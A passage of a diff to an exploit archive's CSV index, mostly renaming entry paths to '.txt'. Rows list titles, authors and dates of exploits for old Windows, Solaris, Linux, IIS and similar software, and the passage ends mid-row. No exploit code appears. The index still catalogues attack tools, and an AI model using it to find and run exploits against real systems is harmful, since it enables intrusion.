19085,platforms/linux/dos/19085.c,"Linux kernel 2.0/2.1 SIGIO Vulnerability",1998-06-30,"David Luyer",linux,dos,0 19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)",1999-02-09,"smiler and cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format DoS Exploit",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 -19093,platforms/multiple/remote/19093,"Allaire ColdFusion Server <= 4.0 - Remote File Display, Deletion, Upload and Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 -19094,platforms/windows/remote/19094,"Internet Explorer 4.0/5.0 DHTML Edit ActiveX Control File Stealing and Cross Frame Access Vulnerability",1999-04-22,"Georgi Guninsky",windows,remote,0 -19095,platforms/linux/local/19095,"GNU GNU bash 1.14 Path Embedded Code Execution Vulnerability",1999-04-20,Shadow,linux,local,0 +19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server <= 4.0 - Remote File Display, Deletion, Upload and Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 +19094,platforms/windows/remote/19094.txt,"Internet Explorer 4.0/5.0 DHTML Edit ActiveX Control File Stealing and Cross Frame Access Vulnerability",1999-04-22,"Georgi Guninsky",windows,remote,0 +19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 Path Embedded Code Execution Vulnerability",1999-04-20,Shadow,linux,local,0 19096,platforms/linux/remote/19096.c,"RedHat Linux <= 5.1,Caldera OpenLinux Standard 1.2 Mountd Vulnerability",1998-08-28,LucySoft,linux,remote,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP SSH Private Key Exposure",2012-06-13,metasploit,hardware,remote,0 @@ -16475,25 +16475,25 @@ id,file,description,date,author,platform,type,port 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 Count.cgi Buffer Overflow Vulnerability",1997-10-16,"Razvan Dragomirescu",linux,remote,0 19106,platforms/linux/local/19106.c,"BSDI BSD/OS <= 2.1,FreeBSD <= 2.1,IBM AIX <= 4.2,SGI IRIX <= 6.4,Sun SunOS <= 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability",1998-07-17,anonymous,linux,remote,0 -19108,platforms/unix/local/19108,"HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 +19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1)",1998-06-27,"Seth McGann",linux,remote,0 19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0 19111,platforms/linux/remote/19111.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND Buffer overflow(1)",1998-04-08,ROTShB,linux,remote,0 19112,platforms/linux/remote/19112.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND Buffer overflow(2)",1998-04-08,prym,linux,remote,0 -19113,platforms/windows/remote/19113,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability",1999-01-02,"Tomas Halgas",windows,remote,23 +19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability",1999-01-02,"Tomas Halgas",windows,remote,23 19117,platforms/linux/remote/19117.c,"Digital UNIX <= 4.0 D,FreeBSD <= 2.2.4,HP HP-UX 10.20/11.0,IBM AIX <= 3.2.5,Linux kernel 2.0/2.1,NetBSD 1.2,Solaris <= 2.5.1 Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,remote,0 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX <= 10.34 rlpdaemon Vulnerability",1998-07-06,"RSI Advise",linux,remote,0 -19120,platforms/multiple/remote/19120,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0 -19121,platforms/multiple/remote/19121,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0 -19122,platforms/linux/local/19122,"Slackware Linux <= 3.5 /etc/group missing results in root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0 +19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0 +19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0 +19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 /etc/group missing results in root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0 19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0 -19124,platforms/linux/remote/19124,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0 -19125,platforms/linux/local/19125,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0 -19126,platforms/solaris/local/19126,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0 -19127,platforms/multiple/remote/19127,"Verity Search97 2.1 Security Vulnerability",1998-07-14,"Stefan Arentz",multiple,remote,0 +19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0 +19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0 +19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0 +19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 Security Vulnerability",1998-07-14,"Stefan Arentz",multiple,remote,0 19128,platforms/solaris/local/19128.c,"Sun Solaris <= 7.0 sdtcm_convert Vulnerability",1998-10-23,UNYUN,solaris,local,0 -19129,platforms/multiple/remote/19129,"Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability",1999-05-07,L0pht,multiple,remote,0 +19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability",1999-05-07,L0pht,multiple,remote,0 19130,platforms/freebsd/local/19130.c,"FreeBSD <= 3.0 UNIX-domain panic Vulnerability",1999-05-05,"Lukasz Luzar",freebsd,local,0 19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server <= 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 19132,platforms/php/webapps/19132.txt,"myre real estate mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 @@ -16506,21 +16506,21 @@ id,file,description,date,author,platform,type,port 19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0 19143,platforms/windows/local/19143.c,"Microsoft Windows - ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0 -19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0 +19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 Server Operator to Administrator Privilege Escalation: System Key Vulnerability",1999-01-11,Mnemonix,windows,local,0 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 Vulnerability",1999-01-03,"Dr. Mudge",linux,local,0 -19147,platforms/windows/remote/19147,"NT IIS4 - Remote Web-Based Administration Vulnerability",1999-01-14,Mnemonix,windows,remote,0 +19147,platforms/windows/remote/19147.txt,"NT IIS4 - Remote Web-Based Administration Vulnerability",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance Vulnerability",1999-01-22,Mnemonix,windows,remote,0 -19152,platforms/windows/remote/19152,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability",1999-01-26,Mnemonix,windows,remote,0 +19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability",1999-01-26,Mnemonix,windows,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 -19156,platforms/windows/remote/19156,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability",1999-01-28,"Georgi Guninski",windows,remote,0 +19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability",1999-01-28,"Georgi Guninski",windows,remote,0 19158,platforms/solaris/local/19158.c,"Sun Solaris <= 2.5.1 PAM & unix_scheme Vulnerability",1997-02-25,"Cristian Schipor",solaris,local,0 19159,platforms/solaris/local/19159.c,"Solaris <= 2.5.1 ffbconfig Vulnerability",1997-02-10,"Cristian Schipor",solaris,local,0 19160,platforms/solaris/local/19160.c,"Solaris <= 2.5.1 chkey Vulnerability",1997-05-19,"Adam Morrison",solaris,local,0 -19161,platforms/solaris/local/19161,"Solaris <= 2.5.1 Ping Vulnerability",1997-06-15,"Adam Caldwell",solaris,local,0 +19161,platforms/solaris/local/19161.txt,"Solaris <= 2.5.1 Ping Vulnerability",1997-06-15,"Adam Caldwell",solaris,local,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig Vulnerability",1998-07-20,Loneguard,irix,local,0 -19164,platforms/windows/remote/19164,"Microsoft IE4 Clipboard Paste Vulnerability",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 -19167,platforms/windows/local/19167,"Ipswitch IMail 5.0,WS_FTP Server 1.0.1/1.0.2 Server Privilege Escalation Vulnerability",1999-02-04,Marc,windows,local,0 +19164,platforms/windows/remote/19164.txt,"Microsoft IE4 Clipboard Paste Vulnerability",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 +19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0,WS_FTP Server 1.0.1/1.0.2 Server Privilege Escalation Vulnerability",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX <= 6.5.4,Solaris <= 2.5.1 ps(1) Buffer Overflow Vulnerability",1997-04-28,"Joe Zbiciak",unix,local,0 19172,platforms/unix/local/19172.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (2)",1997-04-26,BeastMaster,unix,local,0 @@ -16540,13 +16540,13 @@ id,file,description,date,author,platform,type,port 19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection Vulnerability",2012-06-16,Vulnerability-Lab,php,webapps,0 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 -19192,platforms/windows/local/19192,"Hancom Office 2007 Reboot.ini Clear-Text Passwords Vulnerability",1999-02-09,"Russ Cooper",windows,local,0 -19193,platforms/multiple/remote/19193,"Allaire Forums 2.0.4 Getfile Vulnerability",1999-02-11,"Cameron Childress",multiple,remote,0 -19194,platforms/multiple/remote/19194,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability",1999-02-11,"Gary Geisbert",multiple,remote,0 +19192,platforms/windows/local/19192.txt,"Hancom Office 2007 Reboot.ini Clear-Text Passwords Vulnerability",1999-02-09,"Russ Cooper",windows,local,0 +19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 Getfile Vulnerability",1999-02-11,"Cameron Childress",multiple,remote,0 +19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability",1999-02-11,"Gary Geisbert",multiple,remote,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability",1997-07-16,"Paul Ashton",windows,local,0 -19196,platforms/windows/local/19196,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability",1998-03-19,"Martin Dolphin",windows,local,0 -19197,platforms/windows/remote/19197,"Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 -19198,platforms/windows/local/19198,"Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability",1999-02-18,L0pht,windows,local,0 +19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability",1998-03-19,"Martin Dolphin",windows,local,0 +19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 +19198,platforms/windows/local/19198.txt,"Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris <= 2.5.1 automount Vulnerability",1997-11-26,anonymous,solaris,local,0 19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1 .0,FreeBSD FreeBSD 1.1.5 .1/2.0 ,HP HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.3,SunOS <= 4.1.4 libXt library Vulnerability (1)",1997-08-25,bloodmask,unix,local,0 19201,platforms/unix/local/19201.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1 .0,FreeBSD FreeBSD 1.1.5 .1/2.0 ,HP HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.3,SunOS <= 4.1.4 libXt library Vulnerability (2)",1997-08-25,jGgM,unix,local,0 @@ -16554,12 +16554,12 @@ id,file,description,date,author,platform,type,port 19203,platforms/unix/local/19203.c,"BSD/OS <= 2.1,DG/UX <= 4.0,Debian Linux 0.93,Digital UNIX <= 4.0 B,FreeBSD <= 2.1.5,HP-UX <= 10.34,IBM AIX <= 4.1.5,NetBSD 1.0/1.1,NeXTstep <= 4.0, SGI IRIX <= 6.3,SunOS <= 4.1.4 rlogin Vulnerability",1996-12-04,"Roger Espel Llima",unix,local,0 19205,platforms/solaris/local/19205.c,"Sun Solaris <= 7.0 dtprintinfo Buffer Overflow Vulnerability",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris <= 7.0 lpset Buffer Overflow Vulnerability",1999-05-11,"kim yong-jun",solaris,local,0 -19207,platforms/windows/dos/19207,"Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability",1999-05-11,"Miquel van Smoorenburg",windows,dos,0 -19208,platforms/windows/remote/19208,"Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Vulnerability",1999-05-11,"Andrey Kruchkov",windows,remote,0 +19207,platforms/windows/dos/19207.txt,"Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability",1999-05-11,"Miquel van Smoorenburg",windows,dos,0 +19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Vulnerability",1999-05-11,"Andrey Kruchkov",windows,remote,0 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability",1999-05-17,"David Litchfield",windows,local,0 -19210,platforms/irix/local/19210,"SGI IRIX <= 6.5.4 midikeys Root Vulnerability",1999-05-19,"W. Cashdollar",irix,local,0 +19210,platforms/irix/local/19210.txt,"SGI IRIX <= 6.5.4 midikeys Root Vulnerability",1999-05-19,"W. Cashdollar",irix,local,0 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability",1999-05-20,"David Litchfield",windows,local,0 -19212,platforms/multiple/remote/19212,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,remote,0 +19212,platforms/multiple/remote/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,remote,0 19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (2)",1999-05-22,"Georgi Guninski",aix,local,0 19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (3)",1999-05-22,UNYUN,aix,local,0 @@ -16568,57 +16568,57 @@ id,file,description,date,author,platform,type,port 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow Vulnerabilities",1999-05-03,"Arne Vidstrom",linux,remote,0 19219,platforms/linux/remote/19219.c,"bisonware bisonware ftp server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 CFCRYPT.EXE Vulnerability",1998-05-19,"Matt Chapman",windows,local,0 -19221,platforms/multiple/remote/19221,"SmartDesk WebSuite 2.1 - Buffer Overflow Vulnerability",1999-05-25,cmart,multiple,remote,0 -19222,platforms/multiple/remote/19222,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 -19223,platforms/multiple/remote/19223,"Floosietek FTGate 2.1 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 +19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow Vulnerability",1999-05-25,cmart,multiple,remote,0 +19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 +19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 Web File Access Vulnerability",1999-05-25,Marc,windows,remote,0 -19225,platforms/multiple/dos/19225,"Compaq Client Management Agents 3.70/4.0,Insight Management Agents 4.21 A/4.22 A/4.30 A,Intelligent Cluster Administrator 1.0,Management Agents for Workstations 4.20 A,Server Management Agents <= 4.23,Survey Utility 2.0 Web File Access Vulnerability",1999-05-25,"Master Dogen",multiple,dos,0 +19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0,Insight Management Agents 4.21 A/4.22 A/4.30 A,Intelligent Cluster Administrator 1.0,Management Agents for Workstations 4.20 A,Server Management Agents <= 4.23,Survey Utility 2.0 Web File Access Vulnerability",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow Vulnerability",1999-05-26,"Chris Evans",linux,remote,0 -19227,platforms/windows/local/19227,"IBM Remote Control Software 1.0 Vulnerability",1999-05-10,"Thomas Krug",windows,local,0 +19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 Vulnerability",1999-05-10,"Thomas Krug",windows,local,0 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0,Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability",1999-05-25,"J. Abreu Junior",multiple,dos,0 -19229,platforms/aix/local/19229,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 -19230,platforms/multiple/remote/19230,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,remote,0 +19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 +19230,platforms/multiple/remote/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,remote,0 19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,metasploit,windows,remote,0 -19232,platforms/solaris/local/19232,"SunOS <= 4.1.4 arp(8c) Memory Dump Vulnerability",1994-02-01,anonymous,solaris,local,0 -19233,platforms/solaris/local/19233,"Solaris <= 7.0 aspppd Insecure Temporary File Creation Vulnerability",1996-12-20,Al-Herbish,solaris,local,0 +19232,platforms/solaris/local/19232.txt,"SunOS <= 4.1.4 arp(8c) Memory Dump Vulnerability",1994-02-01,anonymous,solaris,local,0 +19233,platforms/solaris/local/19233.txt,"Solaris <= 7.0 aspppd Insecure Temporary File Creation Vulnerability",1996-12-20,Al-Herbish,solaris,local,0 19234,platforms/solaris/local/19234.c,"Solaris <= 7.0 cancel Vulnerability",1999-03-05,"Josh A. Strickland",solaris,local,0 -19235,platforms/solaris/local/19235,"Solaris <= 7.0 chkperm Vulnerability",1996-12-05,"Kevin L Prigge",solaris,local,0 -19236,platforms/solaris/remote/19236,"Solaris <= 7.0 Coredump Vulnerbility",1996-08-03,"Jungseok Roh",solaris,remote,0 -19237,platforms/aix/remote/19237,"Gordano NTMail 3.0/5.0 SPAM Relay Vulnerability",1999-06-08,Geo,aix,remote,0 -19238,platforms/windows/remote/19238,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0 -19239,platforms/windows/remote/19239,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0 +19235,platforms/solaris/local/19235.txt,"Solaris <= 7.0 chkperm Vulnerability",1996-12-05,"Kevin L Prigge",solaris,local,0 +19236,platforms/solaris/remote/19236.txt,"Solaris <= 7.0 Coredump Vulnerbility",1996-08-03,"Jungseok Roh",solaris,remote,0 +19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 SPAM Relay Vulnerability",1999-06-08,Geo,aix,remote,0 +19238,platforms/windows/remote/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0 +19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 19241,platforms/linux/remote/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0 -19242,platforms/multiple/remote/19242,"CdomainFree <= 2.4 - Remote File Execution Vulnerability",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 -19243,platforms/linux/local/19243,"G. Wilford man 2.3.10 Symlink Vulnerability",1999-06-02,"Thomas Fischbacher",linux,local,0 +19242,platforms/multiple/remote/19242.txt,"CdomainFree <= 2.4 - Remote File Execution Vulnerability",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 +19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 Symlink Vulnerability",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 Overload Vulnerability",1999-06-03,"Juergen Schmidt",osx,local,0 19245,platforms/windows/remote/19245.pl,"Microsoft IIS 4.0 - Buffer Overflow Vulnerability (1)",1999-06-15,"eEye Digital Security Team",windows,remote,0 19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow Vulnerability (2)",1999-06-15,Stinko,windows,remote,0 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow Vulnerability (3)",1999-06-15,"eeye security",linux,remote,0 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow Vulnerability (4)",1999-06-15,"Greg Hoglund",windows,remote,0 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 Vulnerability",1999-03-02,Arthur,linux,local,0 -19250,platforms/linux/local/19250,"Linux kernel 2.0/2.1/2.2 autofs Vulnerability",1999-02-19,"Brian Jones",linux,local,0 +19250,platforms/linux/local/19250.txt,"Linux kernel 2.0/2.1/2.2 autofs Vulnerability",1999-02-19,"Brian Jones",linux,local,0 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 Protocol Four and Zero Header Length Vulnerability",1999-06-16,badi,linux,remote,0 -19253,platforms/linux/remote/19253,"Debian Linux 2.1 - httpd Vulnerability",1999-06-17,anonymous,linux,remote,0 +19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd Vulnerability",1999-06-17,anonymous,linux,remote,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 gnuplot Vulnerability",1999-03-04,xnec,linux,local,0 -19255,platforms/linux/local/19255,"RedHat Linux 5.2 i386/6.0 No Logging Vulnerability",1999-06-09,"Tani Hosokawa",linux,local,0 +19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 No Logging Vulnerability",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3,Debian Linux <= 2.0 netstd Vulnerabilities",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 Symlink Vulnerability",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core Vulnerability",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 